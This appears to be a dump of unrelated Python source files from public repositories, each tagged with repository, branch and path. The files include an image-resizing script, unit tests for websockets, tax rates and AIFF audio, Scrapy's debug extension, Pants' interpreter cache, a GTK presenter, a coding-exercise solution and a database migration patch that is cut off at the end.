#!/usr/bin/python import sys, os, json from subprocess import call assetCatalogPath = sys.argv[1] brandAssetsDir = sys.argv[2] + '.brandassets' def generateImage(contentsRelativeDir, isBaseImage1x, newWidth, newHeight): contentsDir = os.path.join(assetCatalogPath, contentsRelativeDir) if isBaseImage1x: existingImageIndex = 0 newImageIndex = 1 else: existingImageIndex = 1 newImageIndex = 0 with open(os.path.join(contentsDir, 'Contents.json')) as jsonFile: jsonContents = json.load(jsonFile) existingImageRelativePath = jsonContents['images'][existingImageIndex]['filename'] existingImagePath = os.path.join(contentsDir, existingImageRelativePath) call(['sips', '--resampleHeightWidth', str(newHeight), str(newWidth), existingImagePath, '--out', os.path.join(contentsDir, jsonContents['images'][newImageIndex]['filename'])]) generateImage(sys.argv[3] + '.launchimage', True, 3840, 2160) generateImage(os.path.join(brandAssetsDir, 'topshelf_wide.imageset'), True, 4640, 1440) appIconSmall = os.path.join(brandAssetsDir, 'icon.imagestack') for i in xrange(1, 5): generateImage(os.path.join(appIconSmall, 'Layer{}.imagestacklayer'.format(i), 'Content.imageset'), False, 400, 240)
poppy-project/pypot
refs/heads/master
tests/test_websocket.py
1
import json import time import unittest import websocket from pypot.creatures import PoppyErgoJr from utils import get_open_port @unittest.skip("tornado.ioloop from jr.ws as well as js.http must be stopped by jr.close() before launching new jr instances") class TestWebsocketsCommunication(unittest.TestCase): """docstring for TestWebsocketsCommunication""" def setUp(self): port = get_open_port() self.jr = PoppyErgoJr(simulator='poppy-simu', use_ws=True, ws_port=port) self.ws_url = 'ws://127.0.0.1:{}'.format(port) while True: try: self.ws = websocket.WebSocket() self.ws.connect(self.ws_url) break except ConnectionError: time.sleep(1.0) def tearDown(self): self.ws.close() def test_connected(self): self.assertTrue(self.ws.connected) def test_recv_state(self): state = json.loads(self.ws.recv()) self.assertSetEqual(set(state.keys()), {m.name for m in self.jr.motors}) def test_led(self): obj = { 'm1': { 'led': 'red' } } self.ws.send(json.dumps(obj)) if __name__ == '__main__': unittest.main()
SongGithub/Coding_Exercise
refs/heads/master
tests/test_tax_rate.py
2
from src.tax_rate import TaxRate import unittest,os,settings class TestTaxRate(unittest.TestCase): """ docstring for TestTaxRate """ def setUp(self): tax_rate_file_path = os.path.join( settings.TAX_RATE_BACKUP_PATH, settings.TAX_RATE_DEFAULT_FILENAME ) self.instance = TaxRate(tax_rate_file_path) print self.instance.__get_taxrate_local_json__() def test_getting_tax_rate(self): """prove if tax rate details can be returned""" self.assertEqual( self.instance.get_taxrate(), [ { u'financial_year': u'2016-17', u'brackets': [ {u'rate': 0.0, u'low_end': 0.0}, {u'rate': 0.19, u'low_end': 18201.0}, {u'rate': 0.325, u'low_end': 37001.0}, {u'rate': 0.37, u'low_end': 87001.0}, {u'rate': 0.45, u'low_end': 180001.0}]}, { u'financial_year': u'2015-16', u'brackets': [{u'rate': 0.0, u'low_end': 0.0}, {u'rate': 0.19, u'low_end': 18201.0}, {u'rate': 0.325, u'low_end': 37001.0}, {u'rate': 0.37, u'low_end': 80001.0}, {u'rate': 0.45, u'low_end': 180001.0}] } ] ) def test_get_taxrate_local_json__(self): self.assertEqual( self.instance.__get_taxrate_local_json__(), [ { u'financial_year': u'2016-17', u'brackets': [ {u'rate': 0.0, u'low_end': 0.0}, {u'rate': 0.19, u'low_end': 18201.0}, {u'rate': 0.325, u'low_end': 37001.0}, {u'rate': 0.37, u'low_end': 87001.0}, {u'rate': 0.45, u'low_end': 180001.0}]}, { u'financial_year': u'2015-16', u'brackets': [{u'rate': 0.0, u'low_end': 0.0}, {u'rate': 0.19, u'low_end': 18201.0}, {u'rate': 0.325, u'low_end': 37001.0}, {u'rate': 0.37, u'low_end': 80001.0}, {u'rate': 0.45, u'low_end': 180001.0}] } ] ) def test_calculate_tax(self): self.assertEqual( self.instance.calculate_tax(18200), 0 ) self.assertEqual( self.instance.calculate_tax(36999), 3572 ) self.assertEqual( self.instance.calculate_tax(79999), 17546 ) self.assertEqual( self.instance.calculate_tax(179999), 54546 )
agusc/scrapy
refs/heads/master
scrapy/extensions/debug.py
152
""" Extensions for debugging Scrapy See documentation in docs/topics/extensions.rst """ import sys import signal import logging import traceback import threading from pdb import Pdb from scrapy.utils.engine import format_engine_status from scrapy.utils.trackref import format_live_refs logger = logging.getLogger(__name__) class StackTraceDump(object): def __init__(self, crawler=None): self.crawler = crawler try: signal.signal(signal.SIGUSR2, self.dump_stacktrace) signal.signal(signal.SIGQUIT, self.dump_stacktrace) except AttributeError: # win32 platforms don't support SIGUSR signals pass @classmethod def from_crawler(cls, crawler): return cls(crawler) def dump_stacktrace(self, signum, frame): log_args = { 'stackdumps': self._thread_stacks(), 'enginestatus': format_engine_status(self.crawler.engine), 'liverefs': format_live_refs(), } logger.info("Dumping stack trace and engine status\n" "%(enginestatus)s\n%(liverefs)s\n%(stackdumps)s", log_args, extra={'crawler': self.crawler}) def _thread_stacks(self): id2name = dict((th.ident, th.name) for th in threading.enumerate()) dumps = '' for id_, frame in sys._current_frames().items(): name = id2name.get(id_, '') dump = ''.join(traceback.format_stack(frame)) dumps += "# Thread: {0}({1})\n{2}\n".format(name, id_, dump) return dumps class Debugger(object): def __init__(self): try: signal.signal(signal.SIGUSR2, self._enter_debugger) except AttributeError: # win32 platforms don't support SIGUSR signals pass def _enter_debugger(self, signum, frame): Pdb().set_trace(frame.f_back)
cevaris/pants
refs/heads/master
src/python/pants/backend/python/interpreter_cache.py
2
# coding=utf-8 # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) import os import shutil from pex.interpreter import PythonIdentity, PythonInterpreter from pex.package import EggPackage, Package, SourcePackage from pex.resolver import resolve from twitter.common.collections import OrderedSet from pants.backend.python.targets.python_target import PythonTarget from pants.base.exceptions import TaskError from pants.util.dirutil import safe_concurrent_creation, safe_mkdir # TODO(wickman) Create a safer version of this and add to twitter.common.dirutil def _safe_link(src, dst): try: os.unlink(dst) except OSError: pass os.symlink(src, dst) class PythonInterpreterCache(object): @staticmethod def _matches(interpreter, filters): return any(interpreter.identity.matches(filt) for filt in filters) @classmethod def _matching(cls, interpreters, filters): for interpreter in interpreters: if cls._matches(interpreter, filters): yield interpreter @classmethod def select_interpreter(cls, compatibilities, allow_multiple=False): """Given a set of interpreters, either return them all if ``allow_multiple`` is ``True``; otherwise, return the lowest compatible interpreter. """ if allow_multiple: return compatibilities return [min(compatibilities)] if compatibilities else [] def __init__(self, python_setup, python_repos, logger=None): self._python_setup = python_setup self._python_repos = python_repos self._cache_dir = python_setup.interpreter_cache_dir safe_mkdir(self._cache_dir) self._interpreters = set() self._logger = logger or (lambda msg: True) self._default_filters = (python_setup.interpreter_requirement or b'',) @property def interpreters(self): """Returns the set of cached interpreters.""" return self._interpreters def select_interpreter_for_targets(self, targets): """Pick an interpreter compatible with all the specified targets.""" allowed_interpreters = OrderedSet(self.interpreters) tgts_with_compatibilities = [] # Used only for error messages. # Constrain allowed_interpreters based on each target's compatibility requirements. for target in targets: if isinstance(target, PythonTarget) and target.compatibility: tgts_with_compatibilities.append(target) compatible_with_target = list(self.matched_interpreters(target.compatibility)) allowed_interpreters &= compatible_with_target if not allowed_interpreters: # Create a helpful error message. unique_compatibilities = set(tuple(t.compatibility) for t in tgts_with_compatibilities) unique_compatibilities_strs = [','.join(x) for x in unique_compatibilities if x] tgts_with_compatibilities_strs = [str(t) for t in tgts_with_compatibilities] raise TaskError('Unable to detect a suitable interpreter for compatibilities: {} ' '(Conflicting targets: {})'.format(' && '.join(unique_compatibilities_strs), ', '.join(tgts_with_compatibilities_strs))) # Return the lowest compatible interpreter. return self.select_interpreter(allowed_interpreters)[0] def _interpreter_from_path(self, path, filters): interpreter_dir = os.path.basename(path) identity = PythonIdentity.from_path(interpreter_dir) try: executable = os.readlink(os.path.join(path, 'python')) except OSError: return None interpreter = PythonInterpreter(executable, identity) if self._matches(interpreter, filters): return self._resolve(interpreter) return None def _setup_interpreter(self, interpreter, cache_target_path): with safe_concurrent_creation(cache_target_path) as safe_path: os.mkdir(safe_path) # Parent will already have been created by safe_concurrent_creation. os.symlink(interpreter.binary, os.path.join(safe_path, 'python')) return self._resolve(interpreter, safe_path) def _setup_cached(self, filters): """Find all currently-cached interpreters.""" for interpreter_dir in os.listdir(self._cache_dir): path = os.path.join(self._cache_dir, interpreter_dir) pi = self._interpreter_from_path(path, filters) if pi: self._logger('Detected interpreter {}: {}'.format(pi.binary, str(pi.identity))) self._interpreters.add(pi) def _setup_paths(self, paths, filters): """Find interpreters under paths, and cache them.""" for interpreter in self._matching(PythonInterpreter.all(paths), filters): identity_str = str(interpreter.identity) cache_path = os.path.join(self._cache_dir, identity_str) pi = self._interpreter_from_path(cache_path, filters) if pi is None: self._setup_interpreter(interpreter, cache_path) pi = self._interpreter_from_path(cache_path, filters) if pi is None: continue self._interpreters.add(pi) def matched_interpreters(self, filters): """Given some filters, yield any interpreter that matches at least one of them. :param filters: A sequence of strings that constrain the interpreter compatibility for this cache, using the Requirement-style format, e.g. ``'CPython>=3', or just ['>=2.7','<3']`` for requirements agnostic to interpreter class. """ for match in self._matching(self.interpreters, filters): yield match def setup(self, paths=(), force=False, filters=(b'',)): """Sets up a cache of python interpreters. NB: Must be called prior to accessing the ``interpreters`` property or the ``matches`` method. :param paths: The paths to search for a python interpreter; the system ``PATH`` by default. :param bool force: When ``True`` the interpreter cache is always re-built. :param filters: A sequence of strings that constrain the interpreter compatibility for this cache, using the Requirement-style format, e.g. ``'CPython>=3', or just ['>=2.7','<3']`` for requirements agnostic to interpreter class. """ filters = self._default_filters if not any(filters) else filters setup_paths = paths or os.getenv('PATH').split(os.pathsep) self._setup_cached(filters) def unsatisfied_filters(): return filter(lambda f: len(list(self._matching(self.interpreters, [f]))) == 0, filters) if force or len(unsatisfied_filters()) > 0: self._setup_paths(setup_paths, filters) for filt in unsatisfied_filters(): self._logger('No valid interpreters found for {}!'.format(filt)) matches = list(self.matched_interpreters(filters)) if len(matches) == 0: self._logger('Found no valid interpreters!') return matches def _resolve(self, interpreter, interpreter_dir=None): """Resolve and cache an interpreter with a setuptools and wheel capability.""" interpreter = self._resolve_interpreter(interpreter, interpreter_dir, self._python_setup.setuptools_requirement()) if interpreter: return self._resolve_interpreter(interpreter, interpreter_dir, self._python_setup.wheel_requirement()) def _resolve_interpreter(self, interpreter, interpreter_dir, requirement): """Given a :class:`PythonInterpreter` and a requirement, return an interpreter with the capability of resolving that requirement or ``None`` if it's not possible to install a suitable requirement. If interpreter_dir is unspecified, operates on the default location. """ if interpreter.satisfies([requirement]): return interpreter if not interpreter_dir: interpreter_dir = os.path.join(self._cache_dir, str(interpreter.identity)) target_link = os.path.join(interpreter_dir, requirement.key) bdist = self._resolve_and_link(interpreter, requirement, target_link) if bdist: return interpreter.with_extra(bdist.name, bdist.raw_version, bdist.path) else: self._logger('Failed to resolve requirement {} for {}'.format(requirement, interpreter)) def _resolve_and_link(self, interpreter, requirement, target_link): # Short-circuit if there is a local copy. if os.path.exists(target_link) and os.path.exists(os.path.realpath(target_link)): bdist = Package.from_href(os.path.realpath(target_link)) if bdist.satisfies(requirement): return bdist # Since we're resolving to bootstrap a bare interpreter, we won't have wheel available. # Explicitly set the precedence to avoid resolution of wheels or distillation of sdists into # wheels. precedence = (EggPackage, SourcePackage) distributions = resolve(requirements=[requirement], fetchers=self._python_repos.get_fetchers(), interpreter=interpreter, context=self._python_repos.get_network_context(), precedence=precedence) if not distributions: return None assert len(distributions) == 1, ('Expected exactly 1 distribution to be resolved for {}, ' 'found:\n\t{}'.format(requirement, '\n\t'.join(map(str, distributions)))) dist_location = distributions[0].location target_location = os.path.join(os.path.dirname(target_link), os.path.basename(dist_location)) shutil.move(dist_location, target_location) _safe_link(target_location, target_link) self._logger(' installed {}'.format(target_location)) return Package.from_href(target_location)
jdber1/opendrop
refs/heads/master
opendrop/app/ift/report/overview/detail/detail.py
2
# Copyright © 2020, Joseph Berry, Rico Tabor (opendrop.dev@gmail.com) # OpenDrop is released under the GNU GPL License. You are free to # modify and distribute the code, but always under the same license # (i.e. you cannot make commercial derivatives). # # If you use this software in your research, please cite the following # journal articles: # # J. D. Berry, M. J. Neeson, R. R. Dagastine, D. Y. C. Chan and # R. F. Tabor, Measurement of surface and interfacial tension using # pendant drop tensiometry. Journal of Colloid and Interface Science 454 # (2015) 226–237. https://doi.org/10.1016/j.jcis.2015.05.012 # # E. Huang, T. Denning, A. Skoufis, J. Qi, R. R. Dagastine, R. F. Tabor # and J. D. Berry, OpenDrop: Open-source software for pendant drop # tensiometry & contact angle measurements, submitted to the Journal of # Open Source Software # # These citations help us not only to understand who is using and # developing OpenDrop, and for what purpose, but also to justify # continued development of this code and other open source resources. # # OpenDrop is distributed WITHOUT ANY WARRANTY; without even the # implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR # PURPOSE. See the GNU General Public License for more details. You # should have received a copy of the GNU General Public License along # with this software. If not, see <https://www.gnu.org/licenses/>. from typing import Optional from gi.repository import GObject, Gtk from opendrop.app.ift.services.analysis import PendantAnalysisJob from opendrop.appfw import Presenter, TemplateChild, component, install @component( template_path='./detail.ui', ) class IFTReportOverviewDetailPresenter(Presenter[Gtk.Stack]): no_data_label = TemplateChild('no_data_label') content = TemplateChild('content') _analysis = None event_connections = () view_ready = False def after_view_init(self) -> None: self.view_ready = True # Invoke setter. self.analysis = self.analysis @install @GObject.Property def analysis(self) -> Optional[PendantAnalysisJob]: return self._analysis @analysis.setter def analysis(self, value: Optional[PendantAnalysisJob]) -> None: for conn in self.event_connections: conn.disconnect() self.event_connections = () self._analysis = value if self._analysis is None: self.show_waiting_placeholder() return self.event_connections = ( self._analysis.bn_image.on_changed.connect(self.hdl_analysis_image_changed), ) self.hdl_analysis_image_changed() def hdl_analysis_image_changed(self) -> None: if self._analysis is None or self._analysis.bn_image.get() is None: self.show_waiting_placeholder() else: self.hide_waiting_placeholder() def show_waiting_placeholder(self) -> None: if not self.view_ready: return self.host.set_visible_child(self.no_data_label) def hide_waiting_placeholder(self) -> None: if not self.view_ready: return self.host.set_visible_child(self.content) def destroy(self, *_) -> None: self.analysis = None
iSCInc/status
refs/heads/master
tests/base.py
13
try: import json except ImportError: import simplejson as json import os import unittest from google.appengine.ext import testbed def load_schemas(path): schemas = {} for f in os.listdir(path): filename, ext = os.path.splitext(f) if ext == ".json": schemas[filename] = json.load(open(os.path.join(path, f))) return schemas class TestbedTest(unittest.TestCase): def setUp(self): self.testbed = testbed.Testbed() self.testbed.activate() self.testbed.init_datastore_v3_stub() def tearDown(self): self.testbed.deactivate()
Jeff-Tian/mybnb
refs/heads/master
Python27/Lib/test/test_aifc.py
1
from test.test_support import (findfile, TESTFN, unlink, captured_stdout, run_unittest) import unittest from test import audiotests import os import io import sys import struct import aifc class AifcTest(audiotests.AudioWriteTests, audiotests.AudioTestsWithSourceFile): module = aifc close_fd = True test_unseekable_read = None class AifcPCM8Test(AifcTest, unittest.TestCase): sndfilename = 'pluck-pcm8.aiff' sndfilenframes = 3307 nchannels = 2 sampwidth = 1 framerate = 11025 nframes = 48 comptype = 'NONE' compname = 'not compressed' frames = audiotests.fromhex("""\ 02FF 4B00 3104 8008 CB06 4803 BF01 03FE B8FA B4F3 29EB 1AE6 \ EDE4 C6E2 0EE0 EFE0 57E2 FBE8 13EF D8F7 97FB F5FC 08FB DFFB \ 11FA 3EFB BCFC 66FF CF04 4309 C10E 5112 EE17 8216 7F14 8012 \ 490E 520D EF0F CE0F E40C 630A 080A 2B0B 510E 8B11 B60E 440A \ """) class AifcPCM16Test(AifcTest, unittest.TestCase): sndfilename = 'pluck-pcm16.aiff' sndfilenframes = 3307 nchannels = 2 sampwidth = 2 framerate = 11025 nframes = 48 comptype = 'NONE' compname = 'not compressed' frames = audiotests.fromhex("""\ 022EFFEA 4B5D00F6 311804EA 80E10840 CBE106B1 48A903F5 BFE601B2 036CFE7B \ B858FA3E B4B1F34F 299AEBCA 1A5DE6DA EDFAE491 C628E275 0E09E0B5 EF2AE029 \ 5758E271 FB35E83F 1376EF86 D82BF727 9790FB76 F5FAFC0F 0867FB9C DF30FB43 \ 117EFA36 3EE5FB5B BC79FCB1 66D9FF5D CF150412 431D097C C1BA0EC8 512112A1 \ EEE21753 82071665 7FFF1443 8004128F 49A20EAF 52BB0DBA EFB40F60 CE3C0FBF \ E4B30CEC 63430A5C 08C80A20 2BBB0B08 514A0E43 8BCF1139 B6F60EEB 44120A5E \ """) class AifcPCM24Test(AifcTest, unittest.TestCase): sndfilename = 'pluck-pcm24.aiff' sndfilenframes = 3307 nchannels = 2 sampwidth = 3 framerate = 11025 nframes = 48 comptype = 'NONE' compname = 'not compressed' frames = audiotests.fromhex("""\ 022D65FFEB9D 4B5A0F00FA54 3113C304EE2B 80DCD6084303 \ CBDEC006B261 48A99803F2F8 BFE82401B07D 036BFBFE7B5D \ B85756FA3EC9 B4B055F3502B 299830EBCB62 1A5CA7E6D99A \ EDFA3EE491BD C625EBE27884 0E05A9E0B6CF EF2929E02922 \ 5758D8E27067 FB3557E83E16 1377BFEF8402 D82C5BF7272A \ 978F16FB7745 F5F865FC1013 086635FB9C4E DF30FCFB40EE \ 117FE0FA3438 3EE6B8FB5AC3 BC77A3FCB2F4 66D6DAFF5F32 \ CF13B9041275 431D69097A8C C1BB600EC74E 5120B912A2BA \ EEDF641754C0 8207001664B7 7FFFFF14453F 8000001294E6 \ 499C1B0EB3B2 52B73E0DBCA0 EFB2B20F5FD8 CE3CDB0FBE12 \ E4B49C0CEA2D 6344A80A5A7C 08C8FE0A1FFE 2BB9860B0A0E \ 51486F0E44E1 8BCC64113B05 B6F4EC0EEB36 4413170A5B48 \ """) class AifcPCM32Test(AifcTest, unittest.TestCase): sndfilename = 'pluck-pcm32.aiff' sndfilenframes = 3307 nchannels = 2 sampwidth = 4 framerate = 11025 nframes = 48 comptype = 'NONE' compname = 'not compressed' frames = audiotests.fromhex("""\ 022D65BCFFEB9D92 4B5A0F8000FA549C 3113C34004EE2BC0 80DCD680084303E0 \ CBDEC0C006B26140 48A9980003F2F8FC BFE8248001B07D92 036BFB60FE7B5D34 \ B8575600FA3EC920 B4B05500F3502BC0 29983000EBCB6240 1A5CA7A0E6D99A60 \ EDFA3E80E491BD40 C625EB80E27884A0 0E05A9A0E0B6CFE0 EF292940E0292280 \ 5758D800E2706700 FB3557D8E83E1640 1377BF00EF840280 D82C5B80F7272A80 \ 978F1600FB774560 F5F86510FC101364 086635A0FB9C4E20 DF30FC40FB40EE28 \ 117FE0A0FA3438B0 3EE6B840FB5AC3F0 BC77A380FCB2F454 66D6DA80FF5F32B4 \ CF13B980041275B0 431D6980097A8C00 C1BB60000EC74E00 5120B98012A2BAA0 \ EEDF64C01754C060 820700001664B780 7FFFFFFF14453F40 800000001294E6E0 \ 499C1B000EB3B270 52B73E000DBCA020 EFB2B2E00F5FD880 CE3CDB400FBE1270 \ E4B49CC00CEA2D90 6344A8800A5A7CA0 08C8FE800A1FFEE0 2BB986C00B0A0E00 \ 51486F800E44E190 8BCC6480113B0580 B6F4EC000EEB3630 441317800A5B48A0 \ """) class AifcULAWTest(AifcTest, unittest.TestCase): sndfilename = 'pluck-ulaw.aifc' sndfilenframes = 3307 nchannels = 2 sampwidth = 2 framerate = 11025 nframes = 48 comptype = 'ulaw' compname = '' frames = audiotests.fromhex("""\ 022CFFE8 497C0104 307C04DC 8284083C CB84069C 497C03DC BE8401AC 036CFE74 \ B684FA24 B684F344 2A7CEC04 19FCE704 EE04E504 C584E204 0E3CE104 EF04DF84 \ 557CE204 FB24E804 12FCEF04 D784F744 9684FB64 F5C4FC24 083CFBA4 DF84FB24 \ 11FCFA24 3E7CFB64 BA84FCB4 657CFF5C CF84041C 417C093C C1840EBC 517C12FC \ EF0416FC 828415FC 7D7C13FC 828412FC 497C0EBC 517C0DBC F0040F3C CD840FFC \ E5040CBC 617C0A3C 08BC0A3C 2C7C0B3C 517C0E3C 8A8410FC B6840EBC 457C0A3C \ """) if sys.byteorder != 'big': frames = audiotests.byteswap2(frames) class AifcMiscTest(audiotests.AudioTests, unittest.TestCase): def test_skipunknown(self): #Issue 2245 #This file contains chunk types aifc doesn't recognize. self.f = aifc.open(findfile('Sine-1000Hz-300ms.aif')) def test_write_markers_values(self): fout = aifc.open(io.BytesIO(), 'wb') self.assertEqual(fout.getmarkers(), None) fout.setmark(1, 0, 'foo1') fout.setmark(1, 1, 'foo2') self.assertEqual(fout.getmark(1), (1, 1, 'foo2')) self.assertEqual(fout.getmarkers(), [(1, 1, 'foo2')]) fout.initfp(None) def test_read_markers(self): fout = self.fout = aifc.open(TESTFN, 'wb') fout.aiff() fout.setparams((1, 1, 1, 1, 'NONE', '')) fout.setmark(1, 0, 'odd') fout.setmark(2, 0, 'even') fout.writeframes('\x00') fout.close() f = self.f = aifc.open(TESTFN, 'rb') self.assertEqual(f.getmarkers(), [(1, 0, 'odd'), (2, 0, 'even')]) self.assertEqual(f.getmark(1), (1, 0, 'odd')) self.assertEqual(f.getmark(2), (2, 0, 'even')) self.assertRaises(aifc.Error, f.getmark, 3) class AIFCLowLevelTest(unittest.TestCase): def test_read_written(self): def read_written(self, what): f = io.BytesIO() getattr(aifc, '_write_' + what)(f, x) f.seek(0) return getattr(aifc, '_read_' + what)(f) for x in (-1, 0, 0.1, 1): self.assertEqual(read_written(x, 'float'), x) for x in (float('NaN'), float('Inf')): self.assertEqual(read_written(x, 'float'), aifc._HUGE_VAL) for x in ('', 'foo', 'a' * 255): self.assertEqual(read_written(x, 'string'), x) for x in (-0x7FFFFFFF, -1, 0, 1, 0x7FFFFFFF): self.assertEqual(read_written(x, 'long'), x) for x in (0, 1, 0xFFFFFFFF): self.assertEqual(read_written(x, 'ulong'), x) for x in (-0x7FFF, -1, 0, 1, 0x7FFF): self.assertEqual(read_written(x, 'short'), x) for x in (0, 1, 0xFFFF): self.assertEqual(read_written(x, 'ushort'), x) def test_read_raises(self): f = io.BytesIO('\x00') self.assertRaises(EOFError, aifc._read_ulong, f) self.assertRaises(EOFError, aifc._read_long, f) self.assertRaises(EOFError, aifc._read_ushort, f) self.assertRaises(EOFError, aifc._read_short, f) def test_write_long_string_raises(self): f = io.BytesIO() with self.assertRaises(ValueError): aifc._write_string(f, 'too long' * 255) def test_wrong_open_mode(self): with self.assertRaises(aifc.Error): aifc.open(TESTFN, 'wrong_mode') def test_read_wrong_form(self): b1 = io.BytesIO('WRNG' + struct.pack('>L', 0)) b2 = io.BytesIO('FORM' + struct.pack('>L', 4) + 'WRNG') self.assertRaises(aifc.Error, aifc.open, b1) self.assertRaises(aifc.Error, aifc.open, b2) def test_read_no_comm_chunk(self): b = io.BytesIO('FORM' + struct.pack('>L', 4) + 'AIFF') self.assertRaises(aifc.Error, aifc.open, b) def test_read_wrong_compression_type(self): b = 'FORM' + struct.pack('>L', 4) + 'AIFC' b += 'COMM' + struct.pack('>LhlhhLL', 23, 0, 0, 0, 0, 0, 0) b += 'WRNG' + struct.pack('B', 0) self.assertRaises(aifc.Error, aifc.open, io.BytesIO(b)) def test_read_wrong_marks(self): b = 'FORM' + struct.pack('>L', 4) + 'AIFF' b += 'COMM' + struct.pack('>LhlhhLL', 18, 0, 0, 0, 0, 0, 0) b += 'SSND' + struct.pack('>L', 8) + '\x00' * 8 b += 'MARK' + struct.pack('>LhB', 3, 1, 1) with captured_stdout() as s: f = aifc.open(io.BytesIO(b)) self.assertEqual(s.getvalue(), 'Warning: MARK chunk contains ' 'only 0 markers instead of 1\n') self.assertEqual(f.getmarkers(), None) def test_read_comm_kludge_compname_even(self): b = 'FORM' + struct.pack('>L', 4) + 'AIFC' b += 'COMM' + struct.pack('>LhlhhLL', 18, 0, 0, 0, 0, 0, 0) b += 'NONE' + struct.pack('B', 4) + 'even' + '\x00' b += 'SSND' + struct.pack('>L', 8) + '\x00' * 8 with captured_stdout() as s: f = aifc.open(io.BytesIO(b)) self.assertEqual(s.getvalue(), 'Warning: bad COMM chunk size\n') self.assertEqual(f.getcompname(), 'even') def test_read_comm_kludge_compname_odd(self): b = 'FORM' + struct.pack('>L', 4) + 'AIFC' b += 'COMM' + struct.pack('>LhlhhLL', 18, 0, 0, 0, 0, 0, 0) b += 'NONE' + struct.pack('B', 3) + 'odd' b += 'SSND' + struct.pack('>L', 8) + '\x00' * 8 with captured_stdout() as s: f = aifc.open(io.BytesIO(b)) self.assertEqual(s.getvalue(), 'Warning: bad COMM chunk size\n') self.assertEqual(f.getcompname(), 'odd') def test_write_params_raises(self): fout = aifc.open(io.BytesIO(), 'wb') wrong_params = (0, 0, 0, 0, 'WRNG', '') self.assertRaises(aifc.Error, fout.setparams, wrong_params) self.assertRaises(aifc.Error, fout.getparams) self.assertRaises(aifc.Error, fout.setnchannels, 0) self.assertRaises(aifc.Error, fout.getnchannels) self.assertRaises(aifc.Error, fout.setsampwidth, 0) self.assertRaises(aifc.Error, fout.getsampwidth) self.assertRaises(aifc.Error, fout.setframerate, 0) self.assertRaises(aifc.Error, fout.getframerate) self.assertRaises(aifc.Error, fout.setcomptype, 'WRNG', '') fout.aiff() fout.setnchannels(1) fout.setsampwidth(1) fout.setframerate(1) fout.setnframes(1) fout.writeframes('\x00') self.assertRaises(aifc.Error, fout.setparams, (1, 1, 1, 1, 1, 1)) self.assertRaises(aifc.Error, fout.setnchannels, 1) self.assertRaises(aifc.Error, fout.setsampwidth, 1) self.assertRaises(aifc.Error, fout.setframerate, 1) self.assertRaises(aifc.Error, fout.setnframes, 1) self.assertRaises(aifc.Error, fout.setcomptype, 'NONE', '') self.assertRaises(aifc.Error, fout.aiff) self.assertRaises(aifc.Error, fout.aifc) def test_write_params_singles(self): fout = aifc.open(io.BytesIO(), 'wb') fout.aifc() fout.setnchannels(1) fout.setsampwidth(2) fout.setframerate(3) fout.setnframes(4) fout.setcomptype('NONE', 'name') self.assertEqual(fout.getnchannels(), 1) self.assertEqual(fout.getsampwidth(), 2) self.assertEqual(fout.getframerate(), 3) self.assertEqual(fout.getnframes(), 0) self.assertEqual(fout.tell(), 0) self.assertEqual(fout.getcomptype(), 'NONE') self.assertEqual(fout.getcompname(), 'name') fout.writeframes('\x00' * 4 * fout.getsampwidth() * fout.getnchannels()) self.assertEqual(fout.getnframes(), 4) self.assertEqual(fout.tell(), 4) def test_write_params_bunch(self): fout = aifc.open(io.BytesIO(), 'wb') fout.aifc() p = (1, 2, 3, 4, 'NONE', 'name') fout.setparams(p) self.assertEqual(fout.getparams(), p) fout.initfp(None) def test_write_header_raises(self): fout = aifc.open(io.BytesIO(), 'wb') self.assertRaises(aifc.Error, fout.close) fout = aifc.open(io.BytesIO(), 'wb') fout.setnchannels(1) self.assertRaises(aifc.Error, fout.close) fout = aifc.open(io.BytesIO(), 'wb') fout.setnchannels(1) fout.setsampwidth(1) self.assertRaises(aifc.Error, fout.close) def test_write_header_comptype_raises(self): for comptype in ('ULAW', 'ulaw', 'ALAW', 'alaw', 'G722'): fout = aifc.open(io.BytesIO(), 'wb') fout.setsampwidth(1) fout.setcomptype(comptype, '') self.assertRaises(aifc.Error, fout.close) fout.initfp(None) def test_write_markers_raises(self): fout = aifc.open(io.BytesIO(), 'wb') self.assertRaises(aifc.Error, fout.setmark, 0, 0, '') self.assertRaises(aifc.Error, fout.setmark, 1, -1, '') self.assertRaises(aifc.Error, fout.setmark, 1, 0, None) self.assertRaises(aifc.Error, fout.getmark, 1) fout.initfp(None) def test_write_aiff_by_extension(self): sampwidth = 2 filename = TESTFN + '.aiff' self.addCleanup(unlink, filename) fout = self.fout = aifc.open(filename, 'wb') fout.setparams((1, sampwidth, 1, 1, 'ULAW', '')) frames = '\x00' * fout.getnchannels() * sampwidth fout.writeframes(frames) fout.close() f = self.f = aifc.open(filename, 'rb') self.assertEqual(f.getcomptype(), 'NONE') f.close() def test_main(): run_unittest(AifcPCM8Test, AifcPCM16Test, AifcPCM16Test, AifcPCM24Test, AifcPCM32Test, AifcULAWTest, AifcMiscTest, AIFCLowLevelTest) if __name__ == "__main__": test_main()
l33tdaima/l33tdaima
refs/heads/master
p859e/buddy_string.py
1
class Solution: def buddyStrings(self, A: str, B: str) -> bool: if len(A) != len(B): return False if A == B and len(set(A)) < len(A): return True diff = [(a, b) for a, b in zip(A, B) if a != b] return len(diff) == 2 and diff[0] == diff[1][::-1] # TESTS tests = [ ("ab", "ba", True), ("ab", "ab", False), ("aa", "aa", True), ("aaaaaaabc", "aaaaaaacb", True), ("", "aa", False), ] for A, B, expected in tests: sol = Solution() actual = sol.buddyStrings(A, B) print("Are", A, "and", B, "buddy strings? ->", actual) assert actual == expected
gangadhar-kadam/powapp
refs/heads/master
patches/january_2013/file_list_rename_returns.py
30
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt import webnotes from webnotes.utils import get_base_path import os def execute(): # find out when was the file list patch run res = webnotes.conn.sql("""select applied_on from `__PatchLog` where patch='patches.december_2012.file_list_rename' order by applied_on desc limit 1""") if res: patch_date = res[0][0].date() files_path = os.path.join(get_base_path(), "public", "files") change_map = {} file_data_list = webnotes.conn.sql("""select name, file_name from `tabFile Data` where date(modified) <= %s and ifnull(file_url, '')='' and name like "%%-%%" """, patch_date) # print patch_date # print file_data_list # print files_path for fid, file_name in file_data_list: if os.path.exists(os.path.join(files_path, fid)): new_fid, new_file_name = fid.replace("-", ""), file_name.replace("-", "") try: webnotes.conn.sql("""update `tabFile Data` set name=%s, file_name=%s where name=%s""", (new_fid, new_file_name, fid)) os.rename(os.path.join(files_path, fid), os.path.join(files_path, new_fid)) change_map[",".join((file_name, fid))] = 